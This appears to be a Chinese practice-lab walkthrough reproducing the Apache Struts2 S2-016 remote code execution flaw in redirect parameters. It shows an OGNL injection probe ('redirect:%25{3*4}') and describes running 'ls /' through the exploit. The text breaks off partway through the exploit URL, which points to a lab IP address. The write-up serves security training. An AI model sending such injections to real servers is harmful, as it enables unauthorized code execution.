Apache Struts2远程代码执行漏洞(S2-016)复现
难易程度:★★
题目类型:命令执行
使用工具:FireFox浏览器
漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。
1.打开靶场,尝试访问/index.action。
证明存在该页面。
2.测试一下是否存在漏洞输入/index.action?redirect:%25{3*4}。
返回空白页。
3.使用url编码再试一次。
执行了表达式,证明存在漏洞。
4.执行exp,用ls/查看存在的文件。
访问
http://219.153.49.228:40926/index.action?redi